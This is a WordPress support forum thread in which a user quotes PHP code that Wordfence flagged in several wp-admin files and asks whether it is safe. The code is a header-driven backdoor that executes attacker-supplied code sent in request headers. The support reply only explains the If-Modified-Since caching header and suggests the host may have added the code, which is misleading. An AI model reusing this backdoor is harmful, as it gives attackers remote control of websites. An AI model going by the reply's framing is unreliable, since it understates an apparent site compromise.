Found Code Check

  • Resolved CPKN

    (@cpkn)


    3 years, 9 months ago

    Hello,

    Wordfence found in different WP files, the code below:

    $_HEADERS = getallheaders();
    if (isset($_HEADERS[‘If-Modified-Since’])) {
    $_admin_h_init = $_HEADERS[‘If-Modified-Since’](”, $_HEADERS[‘Clear-Site-Data’]($_HEADERS[‘Authorization’]));
    $_admin_h_init();
    }

    Its not entirely the same on each file. It has slight differences, but not sure if this is ok or not?

    Examples of places this similar code are:

    wp-admin/user/about.php
    wp-admin/network/menu.php
    wp-admin/network/sites.php
    wp-admin/network/theme-editor.php

Viewing 1 replies (of 1 total)
  • Plugin Support WFAdam

    (@wfadam)

    Hello @cpkn and thanks for reaching out to us!

    The If-Modified-Since request HTTP header makes the request conditional: the server will send back the requested resource, with a 200 status, only if it has been last modified after the given date. If the request has not been modified since the response will be a 304 without any body; the Last-Modified response header of a previous request will contain the date of last modification. Unlike If-Unmodified-Since, If-Modified-Since can only be used with a GET or HEAD.

    When used in combination with If-None-Match, it is ignored, unless the server doesn’t support If-None-Match.

    The most common use case is to update a cached entity that has no associated ETag.

    I would ask your host if this code was inserted by them before we explore other causes of the code.

    Let me know what they say!

    Thanks!

Viewing 1 replies (of 1 total)
  • The topic ‘Found Code Check’ is closed to new replies.